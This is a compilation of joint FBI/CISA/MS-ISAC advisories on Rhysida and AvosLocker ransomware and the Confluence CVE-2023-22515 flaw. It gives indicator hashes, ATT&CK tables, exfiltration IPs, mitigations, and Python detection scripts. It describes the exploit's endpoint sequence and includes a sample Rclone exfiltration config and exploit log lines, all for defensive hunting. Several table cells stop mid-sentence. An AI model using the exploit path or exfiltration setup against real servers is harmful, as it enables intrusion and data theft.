| PsLoggedon.exe | d689cb1dbd2e4c06cd15e51a6871c406c595790ddcdcd7dc8d0401c7183720ef |
| PsService64.exe | 554f523914cdbaed8b17527170502199c185bd69a41c81102c50dbb0e5e5a78d |
| PsService.exe | d3a816fe5d545a80e4639b34b90d92d1039eb71ef59e6e81b3c0e043a45b751c |
| Eula.txt | 8329bcbadc7f81539a4969ca13f0be5b8eb7652b912324a1926fc9bfb6ec005a |
| psfile64.exe | be922312978a53c92a49fefd2c9f9cc098767b36f0e4d2e829d24725df65bc21 |
| psfile.exe | 4243dc8b991f5f8b3c0f233ca2110a1e03a1d716c3f51e88faf1d59b8242d329 |
| pskill64.exe | 7ba47558c99e18c2c6449be804b5e765c48d3a70ceaa04c1e0fae67ff1d7178d |
| pskill.exe | 5ef168f83b55d2cbd2426afc5e6fa8161270fa6a2a312831332dc472c95dfa42 |
| pslist64.exe | d3247f03dcd7b9335344ebba76a0b92370f32f1cb0e480c734da52db2bd8df60 |
| pslist.exe | ed05f5d462767b3986583188000143f0eb24f7d89605523a28950e72e6b9039a |
| psloglist64.exe | 5e55b4caf47a248a10abd009617684e969dbe5c448d087ee8178262aaab68636 |
| psloglist.exe | dcdb9bd39b6014434190a9949dedf633726fdb470e95cc47cdaa47c1964b969f |
| pspasswd64.exe | 8d950068f46a04e77ad6637c680cccf5d703a1828fbd6bdca513268af4f2170f |
| pspasswd.exe | 6ed5d50cf9d07db73eaa92c5405f6b1bf670028c602c605dfa7d4fcb80ef0801 |
| psping64.exe | d1f718d219930e57794bdadf9dda61406294b0759038cef282f7544b44b92285 |
| psping.exe | 355b4a82313074999bd8fa1332b1ed00034e63bd2a0d0367e2622f35d75cf140 |
| psshutdown64.exe | 4226738489c2a67852d51dbf96574f33e44e509bc265b950d495da79bb457400 |
| psshutdown.exe | 13fd3ad690c73cf0ad26c6716d4e9d1581b47c22fb7518b1d3bf9cfb8f9e9123 |
| pssuspend64.exe | 4bf8fbb7db583e1aacbf36c5f740d012c8321f221066cc68107031bd8b6bc1ee |
| pssuspend.exe | 95a922e178075fb771066db4ab1bd70c7016f794709d514ab1c7f11500f016cd |
| PSTools.zip | a9ca77dfe03ce15004157727bb43ba66f00ceb215362c9b3d199f000edaa8d61 |
| Pstools.chm | 2813b6c07d17d25670163e0f66453b42d2f157bf2e42007806ebc6bb9d114acc |
| psversion.txt | 8e43d1ddbd5c129055528a93f1e3fab0ecdf73a8a7ba9713dc4c3e216d7e5db4 |
| psexesvc.exe | This artifact is created when a user establishes a connection using |
See Tables 6-15 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
Additional notable TTPs have been published by the Check Point Incident Response Team.[11]
| Technique Title | ID | Use |
|---|---|---|
| Develop Capabilities | | Rhysida actors have been observed developing resources and custom tools, particularly with program names set to “Rhysida-0.1”, to gain access to victim systems. |

| Technique Title | ID | Use |
|---|---|---|
| Valid Accounts | | Rhysida actors are known to use valid credentials to access internal VPN access points of victims. |
| Exploit Public-Facing Application | | Rhysida actors have been identified exploiting Zerologon, a critical elevation of privilege vulnerability within Microsoft’s Netlogon Remote Protocol. |
| Phishing | | Rhysida actors are known to conduct successful phishing attacks. |

| Technique Title | ID | Use |
|---|---|---|
| Command and Scripting Interpreter: PowerShell | | Rhysida actors used PowerShell commands ( |
| Command and Scripting Interpreter: Windows Command Shell | | Rhysida actors used batch scripting to place |

| Technique Title | ID | Use |
|---|---|---|
| Process Injection: Portable Executable Injection | | Rhysida actors injected a Windows 64-bit PE cryptographic ransomware application into running processes on compromised systems. |

| Technique Title | ID | Use |
|---|---|---|
| Indicator Removal: Clear Windows Event Logs | | Rhysida actors used |
| Indicator Removal: File Deletion | | Rhysida actors used PowerShell commands to delete binary strings. |
| Hide Artifacts: Hidden Window | | Rhysida actors have executed hidden PowerShell windows. |

| Technique Title | ID | Use |
|---|---|---|
| OS Credential Dumping: NTDS | | Rhysida actors have been observed using |
| Modify Registry | | Rhysida actors were observed running registry modification commands via |

| Technique Title | ID | Use |
|---|---|---|
| System Network Configuration Discovery | | Rhysida actors used the |
| Remote System Discovery | | Rhysida actors used the command |
| System Owner/User Discovery | | Rhysida actors leveraged |
| Permission Groups Discovery: Local Groups | | Rhysida actors used the command |
| Permission Groups Discovery: Domain Groups | | Rhysida actors used the command |
| Account Discovery: Domain Account | | Rhysida actors used the command |
| Domain Trust Discovery | | Rhysida actors used the Windows utility |

| Technique Title | ID | Use |
|---|---|---|
| Remote Services: Remote Desktop Protocol | | Rhysida actors are known to use RDP for lateral movement. |
| Remote Services: SSH | | Rhysida actors used compromised user credentials to leverage PuTTY and remotely connect to victim systems via SSH. |

| Technique Title | ID | Use |
|---|---|---|
| Remote Access Software | | Rhysida actors have been observed using the AnyDesk software to obtain remote access to victim systems and maintain persistence. |

| Technique Title | ID | Use |
|---|---|---|
| Data Encrypted for Impact | | Rhysida actors encrypted victim data using ChaCha20 in combination with a 4096-bit RSA key (hybrid encryption). |
| Financial Theft | | Rhysida actors reportedly engage in “double extortion”—demanding a ransom payment to decrypt victim data and threatening to publish the sensitive exfiltrated data unless the ransom is paid. |
FBI, CISA, and the MS-ISAC recommend that organizations implement the mitigations below to improve your organization’s cybersecurity posture. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, and TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
These mitigations apply to all critical infrastructure organizations and network defenders. FBI, CISA, and the MS-ISAC recommend incorporating secure-by-design and -default principles, limiting the impact of ransomware techniques and strengthening overall security posture. For more information on secure by design, see CISA’s Secure by Design webpage.
In addition, FBI, CISA, and the MS-ISAC recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors:
In addition to applying mitigations, FBI, CISA, and the MS-ISAC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. FBI, CISA, and the MS-ISAC recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
FBI, CISA, and the MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Rhysida actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.
Additional details requested include: a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host and network-based indicators.
FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other threat actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to the FBI’s Internet Crime Complaint Center (IC3) at Ic3.gov, a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center at [email protected] or (888) 282-0870.
Sophos contributed to this CSA.
The information in this report is being provided “as is” for informational purposes only. FBI, CISA, and the MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, and the MS-ISAC.
November 15, 2023: Initial version.
The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint Cybersecurity Advisory (CSA) in response to the active exploitation of CVE-2023-22515. This recently disclosed vulnerability affects certain versions of Atlassian Confluence Data Center and Server, enabling malicious cyber threat actors to obtain initial access to Confluence instances by creating unauthorized Confluence administrator accounts. Threat actors exploited CVE-2023-22515 as a zero-day to obtain access to victim systems and continue active exploitation post-patch. Atlassian has rated this vulnerability as critical; CISA, FBI, and MS-ISAC expect widespread, continued exploitation due to ease of exploitation.
CISA, FBI, and MS-ISAC strongly encourage network administrators to immediately apply the upgrades provided by Atlassian. CISA, FBI, and MS-ISAC also encourage organizations to hunt for malicious activity on their networks using the detection signatures and indicators of compromise (IOCs) in this CSA. If a potential compromise is detected, organizations should apply the incident response recommendations.
For additional information on upgrade instructions, a complete list of affected product versions, and IOCs, see Atlassian’s security advisory for CVE-2023-22515.[1] While Atlassian’s advisory provides interim measures to temporarily mitigate known attack vectors, CISA, FBI, and MS-ISAC strongly encourage upgrading to a fixed version or taking servers offline to apply necessary updates.
CVE-2023-22515 is a critical Broken Access Control vulnerability affecting Atlassian Confluence Data Center and Server; see Atlassian’s security advisory for the complete list of affected versions.[1] Note: Atlassian Cloud sites (sites accessed via an atlassian.net domain) are not affected by this vulnerability, and neither are Confluence Data Center and Server versions before 8.0.0.
Unauthenticated remote threat actors can exploit this vulnerability to create unauthorized Confluence administrator accounts and access Confluence instances. More specifically, threat actors can change the Confluence server’s configuration to indicate the setup is not complete and use the /setup/setupadministrator.action endpoint to create a new administrator user. The vulnerability is triggered via a request on the unauthenticated /server-info.action endpoint.
Because the root cause of the vulnerability allows threat actors to modify critical configuration settings, CISA, FBI, and MS-ISAC assess that threat actors may not be limited to creating new administrator accounts. Open-source analysis further indicates that CWE-20 (Improper Input Validation) is also an appropriate classification.[2] Atlassian released a patch on October 4, 2023, and confirmed that threat actors exploited CVE-2023-22515 as a zero-day, i.e., a previously unidentified vulnerability.[1]
On October 5, 2023, CISA added this vulnerability to its Known Exploited Vulnerabilities Catalog based on evidence of active exploitation. Due to the ease of exploitation, CISA, FBI, and MS-ISAC expect to see widespread exploitation of unpatched Confluence instances in government and private networks.
Post-exploitation exfiltration of data can be executed through a variety of techniques. A predominant method observed involves the use of cURL, a command line tool used to transfer data to or from a server. An additional data exfiltration technique observed is the use of Rclone [S1040], a command line tool used to sync data to cloud and file hosting services such as Amazon Web Services and China-based UCloud Information Technology Limited. Note: This does not preclude the effectiveness of alternate methods, but highlights methods observed to date. Threat actors were observed using Rclone either to upload a configuration file to victim infrastructure or to enter cloud storage credentials via the command line. Example configuration file templates are listed in the following Figures 1 and 2, which are populated with the credentials of the exfiltration point:
Figure 1: Rclone configuration template, remote section [s3]
Figure 2: Rclone configuration template, remote section [minio]
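Because affiliates were seen dropping an Rclone configuration file on victim infrastructure, one cheap hunt is to parse any rclone.conf found on a Confluence server and report remotes that point at cloud storage with embedded credentials. The script below is an added example, not code from the advisory. The configuration it parses is constructed for illustration (placeholder keys, a TEST-NET endpoint) in the shape the advisory describes, and the set of remote types and credential key names it checks is an assumption drawn from Rclone's backend option names, not from the advisory.

```python
import configparser
import io

# Constructed rclone.conf in the shape the advisory describes: an [s3] and a [minio]
# remote carrying the exfiltration point's credentials. All values are placeholders.
SAMPLE_RCLONE_CONF = """\
[s3]
type = s3
provider = AWS
access_key_id = AKIAEXAMPLEEXAMPLE
secret_access_key = examplesecret/examplesecret
region = us-east-1

[minio]
type = s3
provider = Minio
access_key_id = minioadmin
secret_access_key = minioadmin
endpoint = http://203.0.113.10:9000

[local-backup]
type = local
"""

# Assumption: rclone remote types that reach cloud/object storage, and the option
# names rclone uses for credentials on those backends.
CLOUD_TYPES = {"s3", "b2", "azureblob", "swift", "mega", "drive", "dropbox"}
CREDENTIAL_KEYS = ("access_key_id", "secret_access_key", "token", "key", "pass")

def triage_rclone_conf(text):
    """Return one dict per remote that targets cloud storage and carries credentials.
    Secrets are never returned, only whether they are present."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_file(io.StringIO(text))
    hits = []
    for remote in cp.sections():
        sec = cp[remote]
        rtype = sec.get("type", "").strip().lower()
        if rtype not in CLOUD_TYPES:
            continue
        hits.append({
            "remote": remote,
            "type": rtype,
            "provider": sec.get("provider", ""),
            # The endpoint (or AWS region) is the exfiltration destination to block and hunt for.
            "destination": sec.get("endpoint") or sec.get("region") or "(provider default)",
            "has_credentials": any(k in sec for k in CREDENTIAL_KEYS),
        })
    return hits

if __name__ == "__main__":
    for hit in triage_rclone_conf(SAMPLE_RCLONE_CONF):
        print(hit)
```

Run it against every rclone.conf the file-system sweep turns up; a remote with credentials on a server that has no business syncing to object storage is the finding, and the destination field gives you the address to search for in proxy and flow logs.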
The following User-Agent strings were observed in request headers. Note: As additional threat actors begin to use this CVE due to the availability of publicly posted proof-of-concept code, an increasing variation in User-Agent strings is expected:
Python-requests/2.27.1
curl/7.88.1
Disclaimer: Organizations should investigate or vet these IP addresses prior to taking action, such as blocking.
The following IP addresses were obtained from FBI investigations as of October 2023 and observed conducting data exfiltration:
170.106.106[.]16
43.130.1[.]222
152.32.207[.]23
199.19.110[.]14
95.217.6[.]16
Additional IP addresses observed sending related exploit traffic have been shared by Microsoft.[3]
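The two endpoints, the observed User-Agent strings, and the exfiltration IP addresses above are enough to build a first-pass hunt over Confluence access logs. The following script is an added example, not code from the advisory. It parses constructed Tomcat/Apache combined-format access log lines (the sample lines are made up for illustration), flags requests to the two endpoints the advisory names, the two observed User-Agents, and the FBI-listed exfiltration IPs, and reports any source IP that touched both endpoints. The rule that a legitimate request to /server-info.action carries no query string is an assumption made here, not a statement from the advisory; validate it against your own baseline before alerting on it.

```python
import re
from collections import defaultdict

# Constructed sample lines in Apache/Tomcat combined log format (not from the advisory).
# One client hits /server-info.action with parameters, then POSTs to the setup endpoint
# the CSA describes, then pulls content; a later benign client views /server-info.action.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Oct/2023:12:00:01 +0000] "GET /index.action HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [06/Oct/2023:12:01:10 +0000] "GET /server-info.action?param=value HTTP/1.1" 302 0 "-" "Python-requests/2.27.1"
198.51.100.7 - - [06/Oct/2023:12:01:12 +0000] "POST /setup/setupadministrator.action HTTP/1.1" 302 0 "-" "Python-requests/2.27.1"
198.51.100.7 - - [06/Oct/2023:12:02:00 +0000] "GET /rest/api/content?limit=1000 HTTP/1.1" 200 98211 "-" "curl/7.88.1"
95.217.6.16 - - [06/Oct/2023:12:03:30 +0000] "GET /download/attachments/123/file.docx HTTP/1.1" 200 204800 "-" "curl/7.88.1"
10.0.0.9 - - [06/Oct/2023:12:05:00 +0000] "GET /server-info.action HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Indicators taken from the advisory: observed User-Agents and the IPs FBI observed
# conducting exfiltration (defanging brackets removed so they compare as plain strings).
EXPLOIT_UAS = {"Python-requests/2.27.1", "curl/7.88.1"}
EXFIL_IPS = {"170.106.106.16", "43.130.1.222", "152.32.207.23", "199.19.110.14", "95.217.6.16"}

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(rec):
    """Return the list of reasons this request is suspicious (empty if none)."""
    reasons = []
    path, query = (rec["path"].split("?", 1) + [""])[:2]
    # Assumption: a normal visit to /server-info.action carries no query string; the exploit
    # abuses parameters on this unauthenticated endpoint to flip the setup-complete state.
    if path == "/server-info.action" and query:
        reasons.append("server-info.action with query string")
    if path == "/setup/setupadministrator.action" and rec["method"] == "POST":
        reasons.append("POST to setupadministrator.action (admin account creation)")
    if rec["ua"] in EXPLOIT_UAS:
        reasons.append(f"observed exploit User-Agent {rec['ua']}")
    if rec["ip"] in EXFIL_IPS:
        reasons.append("source IP in advisory exfiltration list")
    return reasons

def hunt(log_text):
    """Group findings per source IP; also return IPs that touched both exploit endpoints."""
    findings = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        for reason in classify(rec):
            findings[rec["ip"]].append((rec["ts"], rec["method"], rec["path"], reason))
    chained = {
        ip for ip, hits in findings.items()
        if any("server-info" in r for *_, r in hits)
        and any("setupadministrator" in r for *_, r in hits)
    }
    return dict(findings), chained

if __name__ == "__main__":
    findings, chained = hunt(SAMPLE_LOG)
    for ip, hits in findings.items():
        for ts, method, path, reason in hits:
            print(f"{ip} {ts} {method} {path} -> {reason}")
    print("probable exploitation chain from:", sorted(chained))
```

A User-Agent match on its own is weak (both strings are defaults of popular tools), which is why the script only calls a source "chained" when the same IP hit both endpoints; treat a lone setupadministrator.action POST on a server whose setup finished long ago as a finding regardless of User-Agent.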
Network defenders are encouraged to review and deploy Proofpoint’s Emerging Threat signatures. See Ruleset Update Summary - 2023/10/12 - v10438.[4]
Network defenders are also encouraged to aggregate application and server-level logging from Confluence servers to a logically separated log search and alerting system, as well as configure alerts for signs of exploitation (as detailed in Atlassian’s security advisory).
Organizations are encouraged to review all affected Confluence instances for evidence of compromise, as outlined by Atlassian.[1] If compromise is suspected or detected, organizations should assume that threat actors hold full administrative access and can perform any number of unfettered actions—these include but are not limited to exfiltration of content and system credentials, as well as installation of malicious plugins.
If a potential compromise is detected, organizations should:
These mitigations apply to all organizations using non-cloud Atlassian Confluence Data Center and Server software. CISA, FBI, and MS-ISAC recommend that software manufacturers incorporate secure by design and default principles and tactics into their software development practices to reduce the prevalence of Broken Access Control vulnerabilities, thus strengthening the secure posture for their customers.
For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.
As of October 10, 2023, proof-of-concept exploits for CVE-2023-22515 have been observed in open source publications.[5] While there are immediate concerns such as increased risk of exploitation and the potential integration into malware toolkits, the availability of a proof-of-concept presents an array of security and operational challenges that extend beyond these immediate issues. Immediate action is strongly advised to address the potential risks associated with this development.
CISA, FBI, and MS-ISAC recommend taking immediate action to address the potential associated risks and encourage organizations to:
[1] Atlassian: CVE-2023-22515 - Broken Access Control Vulnerability in Confluence Data Center and Server
[2] Rapid7: CVE-2023-22515 Analysis
[3] Microsoft: CVE-2023-22515 Exploit IP Addresses
[4] Proofpoint: Emerging Threats Rulesets
[5] Confluence CVE-2023-22515 Proof of Concept - vulhub
[6] Atlassian Support: Upgrading Confluence
The information in this report is being provided “as is” for informational purposes only. CISA, FBI, and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA, FBI, and MS-ISAC.
October 16, 2023: Initial version.
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) to disseminate known IOCs, TTPs, and detection methods associated with the AvosLocker variant identified through FBI investigations as recently as May 2023. AvosLocker operates under a ransomware-as-a-service (RaaS) model. AvosLocker affiliates have compromised organizations across multiple critical infrastructure sectors in the United States, affecting Windows, Linux, and VMware ESXi environments. AvosLocker affiliates compromise organizations’ networks by using legitimate software and open-source remote system administration tools. AvosLocker affiliates then use exfiltration-based data extortion tactics with threats of leaking and/or publishing stolen data.
This joint CSA updates the March 17, 2022, AvosLocker ransomware joint CSA, Indicators of Compromise Associated with AvosLocker ransomware, released by FBI and the Department of the Treasury’s Financial Crimes Enforcement Network (FinCEN). This update includes IOCs and TTPs not included in the previous advisory and a YARA rule FBI developed after analyzing a tool associated with an AvosLocker compromise.
FBI and CISA encourage critical infrastructure organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of AvosLocker ransomware and other ransomware incidents.
Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
AvosLocker affiliates use legitimate software and open-source tools during ransomware operations, which include exfiltration-based data extortion. Specifically, affiliates use:
FBI has also observed AvosLocker affiliates using custom batch (.bat) scripts [T1059.003] for lateral movement, privilege escalation, and disabling antivirus software. For additional TTPs, see joint CSA Indicators of Compromise Associated with AvosLocker Ransomware.
See Tables 1 and 2 below for IOCs obtained from January 2023–May 2023.
Files and Tools | MD5
---|---
psscriptpolicytest_im2hdxqi.g0k.ps1 | 829f2233a1cd77e9ec7de98596cd8165
psscriptpolicytest_lysyd03n.o10.ps1 | 6ebd7d7473f0ace3f52c483389cab93f
psscriptpolicytest_1bokrh3l.2nw.ps1 | 10ef090d2f4c8001faadb0a833d60089
psscriptpolicytest_nvuxllhd.fs4.ps1 | 8227af68552198a2d42de51cded2ce60
psscriptpolicytest_2by2p21u.4ej.ps1 | 9d0b3796d1d174080cdfdbd4064bea3a
psscriptpolicytest_te5sbsfv.new.ps1 | af31b5a572b3208f81dbf42f6c143f99
psscriptpolicytest_v3etgbxw.bmm.ps1 | 1892bd45671f17e9f7f63d3ed15e348e
psscriptpolicytest_fqa24ixq.dtc.ps1 | cc68eaf36cb90c08308ad0ca3abc17c1
psscriptpolicytest_jzjombgn.sol.ps1 | 646dc0b7335cffb671ae3dfd1ebefe47
psscriptpolicytest_rdm5qyy1.phg.ps1 | 609a925fd253e82c80262bad31637f19
psscriptpolicytest_endvm2zz.qlp.ps1 | c6a667619fff6cf44f447868d8edd681
psscriptpolicytest_s1mgcgdk.25n.ps1 | 3222c60b10e5a7c3158fd1cb3f513640
psscriptpolicytest_xnjvzu5o.fta.ps1 | 90ce10d9aca909a8d2524bc265ef2fa4
psscriptpolicytest_satzbifj.oli.ps1 | 44a3561fb9e877a2841de36a3698abc0
psscriptpolicytest_grjck50v.nyg.ps1 | 5cb3f10db11e1795c49ec6273c52b5f1
psscriptpolicytest_0bybivfe.x1t.ps1 | 122ea6581a36f14ab5ab65475370107e
psscriptpolicytest_bzoicrns.kat.ps1 | c82d7be7afdc9f3a0e474f019fb7b0f7

Files and Tools | SHA256
---|---
BEACON.PS1 | e68f9c3314beee640cc32f08a8532aa8dcda613543c54a83680c21d7cd49ca0f
Encoded PowerShell script | ad5fd10aa2dc82731f3885553763dfd4548651ef3e28c69f77ad035166d63db7
Encoded PowerShell script | 48dd7d519dbb67b7a2bb2747729fc46e5832c30cafe15f76c1dbe3a249e5e731

Files and Tools | SHA1
---|---
PowerShell backdoor | 2d1ce0231cf8ff967c36bbfc931f3807ddba765c

Email Address
---
keishagrey994@outlook[.]com

Virtual Currency Wallets
---
a6dedd35ad745641c52d6a9f8da1fb09101d152f01b4b0e85a64d21c2a0845ee
bfacebcafff00b94ad2bff96b718a416c353a4ae223aa47d4202cdbc31e09c92
418748c1862627cf91e829c64df9440d19f67f8a7628471d4b3a6cc5696944dd
bc1qn0u8un00nl6uz6uqrw7p50rg86gjrx492jkwfn
Based on an investigation by an advanced digital forensics group, FBI created the following YARA rule to detect the signature for a file identified as enabling malware. NetMonitor.exe is malware masquerading as a legitimate process and has the appearance of a legitimate network monitoring tool. This persistence tool sends pings from the network every five minutes. The NetMonitor executable is configured to use an IP address as its command server, and the program communicates with the server over port 443. During the attack, traffic between NetMonitor and the command server is encrypted; NetMonitor functions like a reverse proxy and allows actors to connect to the tool from outside the victim’s network.
rule NetMonitor (rule body not reproduced here)
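A YARA rule matches one build of NetMonitor.exe; the behaviour the advisory describes (a connection every five minutes to a bare IP address on port 443, with no hostname to resolve) is the more durable signal. The Python below is an added example, not FBI tooling. It takes connection records and a set of IPs seen in DNS answers (both constructed here with TEST-NET addresses), finds flows whose inter-connection intervals are nearly constant, and reports whether the destination was ever resolved by name. The eight-connection minimum and the five percent jitter threshold are assumptions to tune against your own telemetry.

```python
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

def _constructed_records():
    """Constructed (time, src, dst, dport) connection records, not advisory data:
    one host beaconing every ~5 minutes to a bare IP on 443, plus bursty web traffic."""
    t0 = datetime(2023, 5, 1, 9, 0, 0)
    recs = []
    # NetMonitor-like beacon: 12 connections 300 s apart with a couple of seconds of jitter
    for i, jitter in enumerate([0, 2, 0, -2, 0, 2, 0, -2, 0, 2, 0, 0]):
        recs.append((t0 + timedelta(seconds=300 * i + jitter), "10.1.1.20", "203.0.113.45", 443))
    # Interactive browsing to a web host: same count, irregular spacing
    for off in [5, 40, 41, 300, 900, 905, 2400, 2401, 2402, 3100, 3500, 3501]:
        recs.append((t0 + timedelta(seconds=off), "10.1.1.20", "198.51.100.20", 443))
    return sorted(recs)

RECORDS = _constructed_records()
# Constructed set of IPs that appeared in DNS answers on the network: the web host was
# resolved by name, the C2 address never was, as expected of a tool configured with a raw IP.
RESOLVED_IPS = {"198.51.100.20"}

def find_beacons(records, resolved_ips, min_connections=8, max_jitter_ratio=0.05):
    """Flag (src, dst, dport) flows whose inter-connection intervals are nearly constant.
    Returns one dict per flagged flow with its period and DNS-resolution status."""
    by_flow = defaultdict(list)
    for ts, src, dst, dport in records:
        by_flow[(src, dst, dport)].append(ts)
    results = []
    for (src, dst, dport), times in by_flow.items():
        if len(times) < min_connections:
            continue
        times.sort()
        deltas = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        period = statistics.median(deltas)
        if period <= 0:
            continue
        # Coefficient of variation of the intervals: a scheduled beacon has almost none,
        # human-driven traffic is bursty and has a lot.
        spread = statistics.pstdev(deltas) / period
        if spread <= max_jitter_ratio:
            results.append({
                "src": src, "dst": dst, "dport": dport,
                "period_s": round(period),
                "connections": len(times),
                "dst_resolved_by_dns": dst in resolved_ips,
            })
    return results

if __name__ == "__main__":
    for hit in find_beacons(RECORDS, RESOLVED_IPS):
        print(hit)
```

Feed it flow or firewall connection logs for a day and join the flagged destinations against your passive DNS; a fixed-period flow to an address nobody ever resolved is the NetMonitor pattern whatever the binary's hash happens to be.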
See Tables 3-7 for all referenced threat actor tactics and techniques in this advisory.
Table 3: Initial Access

Technique Title | ID | Use
---|---|---
External Remote Services | T1133 | AvosLocker affiliates use remote system administration tools (Splashtop Streamer, Tactical RMM, PuTTy, AnyDesk, PDQ Deploy, and Atera Agent) as backdoor access vectors.

Table 4: Execution

Technique Title | ID | Use
---|---|---
Command and Scripting Interpreter: PowerShell | T1059.001 | AvosLocker affiliates use custom PowerShell scripts to enable privilege escalation and lateral movement, and to disable antivirus.
Command and Scripting Interpreter: Windows Command Shell | T1059.003 | AvosLocker affiliates use custom batch (.bat) scripts for lateral movement, privilege escalation, and disabling antivirus software.
Windows Management Instrumentation | T1047 | AvosLocker affiliates use legitimate Windows tools, such as PsExec and Nltest, during execution.

Table 5: Persistence

Technique Title | ID | Use
---|---|---
Server Software Component | T1505 | AvosLocker affiliates have uploaded and used custom webshells to enable network access.

Table 6: Credential Access

Technique Title | ID | Use
---|---|---
Credentials from Password Stores | T1555 | AvosLocker affiliates use the open-source applications Lazagne and Mimikatz to steal credentials from system stores.

Table 7: Command and Control

Technique Title | ID | Use
---|---|---
Protocol Tunneling | T1572 | AvosLocker affiliates use open-source network tunneling tools such as Ligolo [1] and Chisel [2].
These mitigations apply to all critical infrastructure organizations and network defenders. The FBI and CISA recommend that software manufacturers incorporate secure-by-design and -default principles and tactics into their software development practices to limit the impact of ransomware techniques (such as threat actors leveraging backdoor vulnerabilities in remote software systems), thus strengthening the secure posture for their customers.
For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.
FBI and CISA recommend organizations implement the mitigations below to improve your cybersecurity posture on the basis of the threat actor activity and to reduce the risk of compromise by AvosLocker ransomware. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
Configure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations requiring administrator privileges to reduce the risk of lateral movement by PsExec.
In addition, FBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the impact and risk of compromise by ransomware or data extortion actors:
In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. FBI and CISA recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with AvosLocker affiliates, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. The FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center (IC3) at ic3.gov, a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center at [email protected] or (888) 282-0870.
